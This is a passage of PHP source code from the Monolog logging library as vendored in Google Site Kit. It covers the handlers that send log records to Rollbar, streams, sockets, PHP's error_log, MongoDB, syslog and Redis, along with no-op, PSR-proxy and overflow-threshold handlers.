\Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE => 'info', \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING => 'warning', \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR => 'error', \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL => 'critical', \Google\Site_Kit_Dependencies\Monolog\Logger::ALERT => 'critical', \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY => 'critical']; /** * Records whether any log records have been added since the last flush of the rollbar notifier * * @var bool */ private $hasRecords = \false; /** @var bool */ protected $initialized = \false; /** * @param RollbarLogger $rollbarLogger RollbarLogger object constructed with valid token */ public function __construct(\Google\Site_Kit_Dependencies\Rollbar\RollbarLogger $rollbarLogger, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, bool $bubble = \true) { $this->rollbarLogger = $rollbarLogger; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record) : void { if (!$this->initialized) { // __destructor() doesn't get called on Fatal errors \register_shutdown_function(array($this, 'close')); $this->initialized = \true; } $context = $record['context']; $context = \array_merge($context, $record['extra'], ['level' => $this->levelMap[$record['level']], 'monolog_level' => $record['level_name'], 'channel' => $record['channel'], 'datetime' => $record['datetime']->format('U')]); if (isset($context['exception']) && $context['exception'] instanceof \Throwable) { $exception = $context['exception']; unset($context['exception']); $toLog = $exception; } else { $toLog = $record['message']; } // @phpstan-ignore-next-line $this->rollbarLogger->log($context['level'], $toLog, $context); $this->hasRecords = \true; } public function flush() : void { if ($this->hasRecords) { $this->rollbarLogger->flush(); $this->hasRecords = \false; } } /** * {@inheritDoc} */ public function close() : void { $this->flush(); } /** * {@inheritDoc} */ public function reset() { $this->flush(); parent::reset(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Stores to any stream resource * * Can be used to store into php://stderr, remote and local files, etc. * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class StreamHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @const int */ protected const MAX_CHUNK_SIZE = 2147483647; /** @const int 10MB */ protected const DEFAULT_CHUNK_SIZE = 10 * 1024 * 1024; /** @var int */ protected $streamChunkSize; /** @var resource|null */ protected $stream; /** @var ?string */ protected $url = null; /** @var ?string */ private $errorMessage = null; /** @var ?int */ protected $filePermission; /** @var bool */ protected $useLocking; /** @var string */ protected $fileOpenMode; /** @var true|null */ private $dirCreated = null; /** @var bool */ private $retrying = \false; /** * @param resource|string $stream If a missing path can't be created, an UnexpectedValueException will be thrown on first write * @param int|null $filePermission Optional file permissions (default (0644) are only for owner read/write) * @param bool $useLocking Try to lock log file before doing any writes * @param string $fileOpenMode The fopen() mode used when opening a file, if $stream is a file path * * @throws \InvalidArgumentException If stream is not a resource or string */ public function __construct($stream, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, ?int $filePermission = null, bool $useLocking = \false, $fileOpenMode = 'a') { parent::__construct($level, $bubble); if (($phpMemoryLimit = \Google\Site_Kit_Dependencies\Monolog\Utils::expandIniShorthandBytes(\ini_get('memory_limit'))) !== \false) { if ($phpMemoryLimit > 0) { // use max 10% of allowed memory for the chunk size, and at least 100KB $this->streamChunkSize = \min(static::MAX_CHUNK_SIZE, \max((int) ($phpMemoryLimit / 10), 100 * 1024)); } else { // memory is unlimited, set to the default 10MB $this->streamChunkSize = static::DEFAULT_CHUNK_SIZE; } } else { // no memory limit information, set to the default 10MB $this->streamChunkSize = static::DEFAULT_CHUNK_SIZE; } if (\is_resource($stream)) { $this->stream = $stream; \stream_set_chunk_size($this->stream, $this->streamChunkSize); } elseif (\is_string($stream)) { $this->url = \Google\Site_Kit_Dependencies\Monolog\Utils::canonicalizePath($stream); } else { throw new \InvalidArgumentException('A stream must either be a resource or a string.'); } $this->fileOpenMode = $fileOpenMode; $this->filePermission = $filePermission; $this->useLocking = $useLocking; } /** * {@inheritDoc} */ public function close() : void { if ($this->url && \is_resource($this->stream)) { \fclose($this->stream); } $this->stream = null; $this->dirCreated = null; } /** * Return the currently active stream if it is open * * @return resource|null */ public function getStream() { return $this->stream; } /** * Return the stream URL if it was configured with a URL and not an active resource * * @return string|null */ public function getUrl() : ?string { return $this->url; } /** * @return int */ public function getStreamChunkSize() : int { return $this->streamChunkSize; } /** * {@inheritDoc} */ protected function write(array $record) : void { if (!\is_resource($this->stream)) { $url = $this->url; if (null === $url || '' === $url) { throw new \LogicException('Missing stream url, the stream can not be opened. This may be caused by a premature call to close().' . \Google\Site_Kit_Dependencies\Monolog\Utils::getRecordMessageForException($record)); } $this->createDir($url); $this->errorMessage = null; \set_error_handler(function (...$args) { return $this->customErrorHandler(...$args); }); try { $stream = \fopen($url, $this->fileOpenMode); if ($this->filePermission !== null) { @\chmod($url, $this->filePermission); } } finally { \restore_error_handler(); } if (!\is_resource($stream)) { $this->stream = null; throw new \UnexpectedValueException(\sprintf('The stream or file "%s" could not be opened in append mode: ' . $this->errorMessage, $url) . \Google\Site_Kit_Dependencies\Monolog\Utils::getRecordMessageForException($record)); } \stream_set_chunk_size($stream, $this->streamChunkSize); $this->stream = $stream; } $stream = $this->stream; if (!\is_resource($stream)) { throw new \LogicException('No stream was opened yet' . \Google\Site_Kit_Dependencies\Monolog\Utils::getRecordMessageForException($record)); } if ($this->useLocking) { // ignoring errors here, there's not much we can do about them \flock($stream, \LOCK_EX); } $this->errorMessage = null; \set_error_handler(function (...$args) { return $this->customErrorHandler(...$args); }); try { $this->streamWrite($stream, $record); } finally { \restore_error_handler(); } if ($this->errorMessage !== null) { $error = $this->errorMessage; // close the resource if possible to reopen it, and retry the failed write if (!$this->retrying && $this->url !== null && $this->url !== 'php://memory') { $this->retrying = \true; $this->close(); $this->write($record); return; } throw new \UnexpectedValueException('Writing to the log file failed: ' . $error . \Google\Site_Kit_Dependencies\Monolog\Utils::getRecordMessageForException($record)); } $this->retrying = \false; if ($this->useLocking) { \flock($stream, \LOCK_UN); } } /** * Write to stream * @param resource $stream * @param array $record * * @phpstan-param FormattedRecord $record */ protected function streamWrite($stream, array $record) : void { \fwrite($stream, (string) $record['formatted']); } private function customErrorHandler(int $code, string $msg) : bool { $this->errorMessage = \preg_replace('{^(fopen|mkdir|fwrite)\\(.*?\\): }', '', $msg); return \true; } private function getDirFromStream(string $stream) : ?string { $pos = \strpos($stream, '://'); if ($pos === \false) { return \dirname($stream); } if ('file://' === \substr($stream, 0, 7)) { return \dirname(\substr($stream, 7)); } return null; } private function createDir(string $url) : void { // Do not try to create dir if it has already been tried. if ($this->dirCreated) { return; } $dir = $this->getDirFromStream($url); if (null !== $dir && !\is_dir($dir)) { $this->errorMessage = null; \set_error_handler(function (...$args) { return $this->customErrorHandler(...$args); }); $status = \mkdir($dir, 0777, \true); \restore_error_handler(); if (\false === $status && !\is_dir($dir) && \strpos((string) $this->errorMessage, 'File exists') === \false) { throw new \UnexpectedValueException(\sprintf('There is no existing directory at "%s" and it could not be created: ' . $this->errorMessage, $dir)); } } $this->dirCreated = \true; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Stores to any socket - uses fsockopen() or pfsockopen(). * * @author Pablo de Leon Belloc <pablolb@gmail.com> * @see http://php.net/manual/en/function.fsockopen.php * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class SocketHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var string */ private $connectionString; /** @var float */ private $connectionTimeout; /** @var resource|null */ private $resource; /** @var float */ private $timeout; /** @var float */ private $writingTimeout; /** @var ?int */ private $lastSentBytes = null; /** @var ?int */ private $chunkSize; /** @var bool */ private $persistent; /** @var ?int */ private $errno = null; /** @var ?string */ private $errstr = null; /** @var ?float */ private $lastWritingAt = null; /** * @param string $connectionString Socket connection string * @param bool $persistent Flag to enable/disable persistent connections * @param float $timeout Socket timeout to wait until the request is being aborted * @param float $writingTimeout Socket timeout to wait until the request should've been sent/written * @param float|null $connectionTimeout Socket connect timeout to wait until the connection should've been * established * @param int|null $chunkSize Sets the chunk size. Only has effect during connection in the writing cycle * * @throws \InvalidArgumentException If an invalid timeout value (less than 0) is passed. */ public function __construct(string $connectionString, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, bool $persistent = \false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null) { parent::__construct($level, $bubble); $this->connectionString = $connectionString; if ($connectionTimeout !== null) { $this->validateTimeout($connectionTimeout); } $this->connectionTimeout = $connectionTimeout ?? (float) \ini_get('default_socket_timeout'); $this->persistent = $persistent; $this->validateTimeout($timeout); $this->timeout = $timeout; $this->validateTimeout($writingTimeout); $this->writingTimeout = $writingTimeout; $this->chunkSize = $chunkSize; } /** * Connect (if necessary) and write to the socket * * {@inheritDoc} * * @throws \UnexpectedValueException * @throws \RuntimeException */ protected function write(array $record) : void { $this->connectIfNotConnected(); $data = $this->generateDataStream($record); $this->writeToSocket($data); } /** * We will not close a PersistentSocket instance so it can be reused in other requests. */ public function close() : void { if (!$this->isPersistent()) { $this->closeSocket(); } } /** * Close socket, if open */ public function closeSocket() : void { if (\is_resource($this->resource)) { \fclose($this->resource); $this->resource = null; } } /** * Set socket connection to be persistent. It only has effect before the connection is initiated. */ public function setPersistent(bool $persistent) : self { $this->persistent = $persistent; return $this; } /** * Set connection timeout. Only has effect before we connect. * * @see http://php.net/manual/en/function.fsockopen.php */ public function setConnectionTimeout(float $seconds) : self { $this->validateTimeout($seconds); $this->connectionTimeout = $seconds; return $this; } /** * Set write timeout. Only has effect before we connect. * * @see http://php.net/manual/en/function.stream-set-timeout.php */ public function setTimeout(float $seconds) : self { $this->validateTimeout($seconds); $this->timeout = $seconds; return $this; } /** * Set writing timeout. Only has effect during connection in the writing cycle. * * @param float $seconds 0 for no timeout */ public function setWritingTimeout(float $seconds) : self { $this->validateTimeout($seconds); $this->writingTimeout = $seconds; return $this; } /** * Set chunk size. Only has effect during connection in the writing cycle. */ public function setChunkSize(int $bytes) : self { $this->chunkSize = $bytes; return $this; } /** * Get current connection string */ public function getConnectionString() : string { return $this->connectionString; } /** * Get persistent setting */ public function isPersistent() : bool { return $this->persistent; } /** * Get current connection timeout setting */ public function getConnectionTimeout() : float { return $this->connectionTimeout; } /** * Get current in-transfer timeout */ public function getTimeout() : float { return $this->timeout; } /** * Get current local writing timeout * * @return float */ public function getWritingTimeout() : float { return $this->writingTimeout; } /** * Get current chunk size */ public function getChunkSize() : ?int { return $this->chunkSize; } /** * Check to see if the socket is currently available. * * UDP might appear to be connected but might fail when writing. See http://php.net/fsockopen for details. */ public function isConnected() : bool { return \is_resource($this->resource) && !\feof($this->resource); // on TCP - other party can close connection. } /** * Wrapper to allow mocking * * @return resource|false */ protected function pfsockopen() { return @\pfsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->connectionTimeout); } /** * Wrapper to allow mocking * * @return resource|false */ protected function fsockopen() { return @\fsockopen($this->connectionString, -1, $this->errno, $this->errstr, $this->connectionTimeout); } /** * Wrapper to allow mocking * * @see http://php.net/manual/en/function.stream-set-timeout.php * * @return bool */ protected function streamSetTimeout() { $seconds = \floor($this->timeout); $microseconds = \round(($this->timeout - $seconds) * 1000000.0); if (!\is_resource($this->resource)) { throw new \LogicException('streamSetTimeout called but $this->resource is not a resource'); } return \stream_set_timeout($this->resource, (int) $seconds, (int) $microseconds); } /** * Wrapper to allow mocking * * @see http://php.net/manual/en/function.stream-set-chunk-size.php * * @return int|bool */ protected function streamSetChunkSize() { if (!\is_resource($this->resource)) { throw new \LogicException('streamSetChunkSize called but $this->resource is not a resource'); } if (null === $this->chunkSize) { throw new \LogicException('streamSetChunkSize called but $this->chunkSize is not set'); } return \stream_set_chunk_size($this->resource, $this->chunkSize); } /** * Wrapper to allow mocking * * @return int|bool */ protected function fwrite(string $data) { if (!\is_resource($this->resource)) { throw new \LogicException('fwrite called but $this->resource is not a resource'); } return @\fwrite($this->resource, $data); } /** * Wrapper to allow mocking * * @return mixed[]|bool */ protected function streamGetMetadata() { if (!\is_resource($this->resource)) { throw new \LogicException('streamGetMetadata called but $this->resource is not a resource'); } return \stream_get_meta_data($this->resource); } private function validateTimeout(float $value) : void { if ($value < 0) { throw new \InvalidArgumentException("Timeout must be 0 or a positive float (got {$value})"); } } private function connectIfNotConnected() : void { if ($this->isConnected()) { return; } $this->connect(); } /** * @phpstan-param FormattedRecord $record */ protected function generateDataStream(array $record) : string { return (string) $record['formatted']; } /** * @return resource|null */ protected function getResource() { return $this->resource; } private function connect() : void { $this->createSocketResource(); $this->setSocketTimeout(); $this->setStreamChunkSize(); } private function createSocketResource() : void { if ($this->isPersistent()) { $resource = $this->pfsockopen(); } else { $resource = $this->fsockopen(); } if (\is_bool($resource)) { throw new \UnexpectedValueException("Failed connecting to {$this->connectionString} ({$this->errno}: {$this->errstr})"); } $this->resource = $resource; } private function setSocketTimeout() : void { if (!$this->streamSetTimeout()) { throw new \UnexpectedValueException("Failed setting timeout with stream_set_timeout()"); } } private function setStreamChunkSize() : void { if ($this->chunkSize && !$this->streamSetChunkSize()) { throw new \UnexpectedValueException("Failed setting chunk size with stream_set_chunk_size()"); } } private function writeToSocket(string $data) : void { $length = \strlen($data); $sent = 0; $this->lastSentBytes = $sent; while ($this->isConnected() && $sent < $length) { if (0 == $sent) { $chunk = $this->fwrite($data); } else { $chunk = $this->fwrite(\substr($data, $sent)); } if ($chunk === \false) { throw new \RuntimeException("Could not write to socket"); } $sent += $chunk; $socketInfo = $this->streamGetMetadata(); if (\is_array($socketInfo) && $socketInfo['timed_out']) { throw new \RuntimeException("Write timed-out"); } if ($this->writingIsTimedOut($sent)) { throw new \RuntimeException("Write timed-out, no data sent for `{$this->writingTimeout}` seconds, probably we got disconnected (sent {$sent} of {$length})"); } } if (!$this->isConnected() && $sent < $length) { throw new \RuntimeException("End-of-file reached, probably we got disconnected (sent {$sent} of {$length})"); } } private function writingIsTimedOut(int $sent) : bool { // convert to ms if (0.0 == $this->writingTimeout) { return \false; } if ($sent !== $this->lastSentBytes) { $this->lastWritingAt = \microtime(\true); $this->lastSentBytes = $sent; return \false; } else { \usleep(100); } if (\microtime(\true) - $this->lastWritingAt >= $this->writingTimeout) { $this->closeSocket(); return \true; } return \false; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Stores to PHP error_log() handler. * * @author Elan Ruusamäe <glen@delfi.ee> */ class ErrorLogHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { public const OPERATING_SYSTEM = 0; public const SAPI = 4; /** @var int */ protected $messageType; /** @var bool */ protected $expandNewlines; /** * @param int $messageType Says where the error should go. * @param bool $expandNewlines If set to true, newlines in the message will be expanded to be take multiple log entries */ public function __construct(int $messageType = self::OPERATING_SYSTEM, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, bool $expandNewlines = \false) { parent::__construct($level, $bubble); if (\false === \in_array($messageType, self::getAvailableTypes(), \true)) { $message = \sprintf('The given message type "%s" is not supported', \print_r($messageType, \true)); throw new \InvalidArgumentException($message); } $this->messageType = $messageType; $this->expandNewlines = $expandNewlines; } /** * @return int[] With all available types */ public static function getAvailableTypes() : array { return [self::OPERATING_SYSTEM, self::SAPI]; } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter('[%datetime%] %channel%.%level_name%: %message% %context% %extra%'); } /** * {@inheritDoc} */ protected function write(array $record) : void { if (!$this->expandNewlines) { \error_log((string) $record['formatted'], $this->messageType); return; } $lines = \preg_split('{[\\r\\n]+}', (string) $record['formatted']); if ($lines === \false) { $pcreErrorCode = \preg_last_error(); throw new \RuntimeException('Failed to preg_split formatted string: ' . $pcreErrorCode . ' / ' . \Google\Site_Kit_Dependencies\Monolog\Utils::pcreLastErrorMessage($pcreErrorCode)); } foreach ($lines as $line) { \error_log($line, $this->messageType); } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use MongoDB\Driver\BulkWrite; use MongoDB\Driver\Manager; use Google\Site_Kit_Dependencies\MongoDB\Client; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\MongoDBFormatter; /** * Logs to a MongoDB database. * * Usage example: * * $log = new \Monolog\Logger('application'); * $client = new \MongoDB\Client('mongodb://localhost:27017'); * $mongodb = new \Monolog\Handler\MongoDBHandler($client, 'logs', 'prod'); * $log->pushHandler($mongodb); * * The above examples uses the MongoDB PHP library's client class; however, the * MongoDB\Driver\Manager class from ext-mongodb is also supported. */ class MongoDBHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var \MongoDB\Collection */ private $collection; /** @var Client|Manager */ private $manager; /** @var string */ private $namespace; /** * Constructor. * * @param Client|Manager $mongodb MongoDB library or driver client * @param string $database Database name * @param string $collection Collection name */ public function __construct($mongodb, string $database, string $collection, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { if (!($mongodb instanceof \Google\Site_Kit_Dependencies\MongoDB\Client || $mongodb instanceof \MongoDB\Driver\Manager)) { throw new \InvalidArgumentException('MongoDB\\Client or MongoDB\\Driver\\Manager instance required'); } if ($mongodb instanceof \Google\Site_Kit_Dependencies\MongoDB\Client) { $this->collection = $mongodb->selectCollection($database, $collection); } else { $this->manager = $mongodb; $this->namespace = $database . '.' . $collection; } parent::__construct($level, $bubble); } protected function write(array $record) : void { if (isset($this->collection)) { $this->collection->insertOne($record['formatted']); } if (isset($this->manager, $this->namespace)) { $bulk = new \MongoDB\Driver\BulkWrite(); $bulk->insert($record["formatted"]); $this->manager->executeBulkWrite($this->namespace, $bulk); } } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\MongoDBFormatter(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; /** * No-op * * This handler handles anything, but does nothing, and does not stop bubbling to the rest of the stack. * This can be used for testing, or to disable a handler when overriding a configuration without * influencing the rest of the stack. * * @author Roel Harbers <roelharbers@gmail.com> */ class NoopHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\Handler { /** * {@inheritDoc} */ public function isHandling(array $record) : bool { return \true; } /** * {@inheritDoc} */ public function handle(array $record) : bool { return \false; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Proxies log messages to an existing PSR-3 compliant logger. * * If a formatter is configured, the formatter's output MUST be a string and the * formatted message will be fed to the wrapped PSR logger instead of the original * log record's message. * * @author Michael Moussa <michael.moussa@gmail.com> */ class PsrHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractHandler implements \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface { /** * PSR-3 compliant logger * * @var LoggerInterface */ protected $logger; /** * @var FormatterInterface|null */ protected $formatter; /** * @param LoggerInterface $logger The underlying PSR-3 compliant logger to which messages will be proxied */ public function __construct(\Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface $logger, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { parent::__construct($level, $bubble); $this->logger = $logger; } /** * {@inheritDoc} */ public function handle(array $record) : bool { if (!$this->isHandling($record)) { return \false; } if ($this->formatter) { $formatted = $this->formatter->format($record); $this->logger->log(\strtolower($record['level_name']), (string) $formatted, $record['context']); } else { $this->logger->log(\strtolower($record['level_name']), $record['message'], $record['context']); } return \false === $this->bubble; } /** * Sets the formatter. * * @param FormatterInterface $formatter */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { $this->formatter = $formatter; return $this; } /** * Gets the formatter. * * @return FormatterInterface */ public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { if (!$this->formatter) { throw new \LogicException('No formatter has been set and this handler does not have a default formatter'); } return $this->formatter; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Logs to syslog service. * * usage example: * * $log = new Logger('application'); * $syslog = new SyslogHandler('myfacility', 'local6'); * $formatter = new LineFormatter("%channel%.%level_name%: %message% %extra%"); * $syslog->setFormatter($formatter); * $log->pushHandler($syslog); * * @author Sven Paulus <sven@karlsruhe.org> */ class SyslogHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractSyslogHandler { /** @var string */ protected $ident; /** @var int */ protected $logopts; /** * @param string $ident * @param string|int $facility Either one of the names of the keys in $this->facilities, or a LOG_* facility constant * @param int $logopts Option flags for the openlog() call, defaults to LOG_PID */ public function __construct(string $ident, $facility = \LOG_USER, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, int $logopts = \LOG_PID) { parent::__construct($facility, $level, $bubble); $this->ident = $ident; $this->logopts = $logopts; } /** * {@inheritDoc} */ public function close() : void { \closelog(); } /** * {@inheritDoc} */ protected function write(array $record) : void { if (!\openlog($this->ident, $this->logopts, $this->facility)) { throw new \LogicException('Can\'t open syslog for ident "' . $this->ident . '" and facility "' . $this->facility . '"' . \Google\Site_Kit_Dependencies\Monolog\Utils::getRecordMessageForException($record)); } \syslog($this->logLevels[$record['level']], (string) $record['formatted']); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Logs to a Redis key using rpush * * usage example: * * $log = new Logger('application'); * $redis = new RedisHandler(new Predis\Client("tcp://localhost:6379"), "logs", "prod"); * $log->pushHandler($redis); * * @author Thomas Tourlourat <thomas@tourlourat.com> * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class RedisHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var \Predis\Client<\Predis\Client>|\Redis */ private $redisClient; /** @var string */ private $redisKey; /** @var int */ protected $capSize; /** * @param \Predis\Client<\Predis\Client>|\Redis $redis The redis instance * @param string $key The key name to push records to * @param int $capSize Number of entries to limit list size to, 0 = unlimited */ public function __construct($redis, string $key, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true, int $capSize = 0) { if (!($redis instanceof \Google\Site_Kit_Dependencies\Predis\Client || $redis instanceof \Redis)) { throw new \InvalidArgumentException('Predis\\Client or Redis instance required'); } $this->redisClient = $redis; $this->redisKey = $key; $this->capSize = $capSize; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record) : void { if ($this->capSize) { $this->writeCapped($record); } else { $this->redisClient->rpush($this->redisKey, $record["formatted"]); } } /** * Write and cap the collection * Writes the record to the redis list and caps its * * @phpstan-param FormattedRecord $record */ protected function writeCapped(array $record) : void { if ($this->redisClient instanceof \Redis) { $mode = \defined('\\Redis::MULTI') ? \Redis::MULTI : 1; $this->redisClient->multi($mode)->rpush($this->redisKey, $record["formatted"])->ltrim($this->redisKey, -$this->capSize, -1)->exec(); } else { $redisKey = $this->redisKey; $capSize = $this->capSize; $this->redisClient->transaction(function ($tx) use($record, $redisKey, $capSize) { $tx->rpush($redisKey, $record["formatted"]); $tx->ltrim($redisKey, -$capSize, -1); }); } } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Handler to only pass log messages when a certain threshold of number of messages is reached. * * This can be useful in cases of processing a batch of data, but you're for example only interested * in case it fails catastrophically instead of a warning for 1 or 2 events. Worse things can happen, right? * * Usage example: * * ``` * $log = new Logger('application'); * $handler = new SomeHandler(...) * * // Pass all warnings to the handler when more than 10 & all error messages when more then 5 * $overflow = new OverflowHandler($handler, [Logger::WARNING => 10, Logger::ERROR => 5]); * * $log->pushHandler($overflow); *``` * * @author Kris Buist <krisbuist@gmail.com> */ class OverflowHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractHandler implements \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface { /** @var HandlerInterface */ private $handler; /** @var int[] */ private $thresholdMap = [\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG => 0, \Google\Site_Kit_Dependencies\Monolog\Logger::INFO => 0, \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE => 0, \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING => 0, \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR => 0, \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL => 0, \Google\Site_Kit_Dependencies\Monolog\Logger::ALERT => 0, \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY => 0]; /** * Buffer of all messages passed to the handler before the threshold was reached * * @var mixed[][] */ private $buffer = []; /** * @param HandlerInterface $handler * @param int[] $thresholdMap Dictionary of logger level => threshold */ public function __construct(\Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface $handler, array $thresholdMap = [], $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { $this->handler = $handler; foreach ($thresholdMap as $thresholdLevel => $threshold) { $this->thresholdMap[$thresholdLevel] = $threshold; } parent::__construct($level, $bubble); } /** * Handles a record. * * All records may be passed to this method, and the handler should discard * those that it does not want to handle. * * The return value of this function controls the bubbling process of the handler stack. * Unless the bubbling is interrupted (by returning true), the Logger class will keep on * calling further handlers in the stack with a given log record. * * {@inheritDoc} */ public function handle(array $record) : bool { if ($record['level'] < $this->level) { return \false; } $level = $record['level']; if (!isset($this->thresholdMap[$level])) { $this->thresholdMap[$level] = 0; } if ($this->thresholdMap[$level] > 0) { // The overflow threshold is not yet reached, so we're buffering the record and lowering the threshold by 1 $this->thresholdMap[$level]--; $this->buffer[$level][] = $record; return \false === $this->bubble; } if ($this->thresholdMap[$level] == 0) { // This current message is breaking the threshold. Flush the buffer and continue handling the current record foreach ($this->buffer[$level] ?? [] as $buffered) { $this->handler->handle($buffered); } $this->thresholdMap[$level]--; unset($this->buffer[$level]); } $this->handler->handle($record); return \false === $this->bubble; } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { $this->handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type ' . \get_class($this->handler) . ' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { return $this->handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type ' . 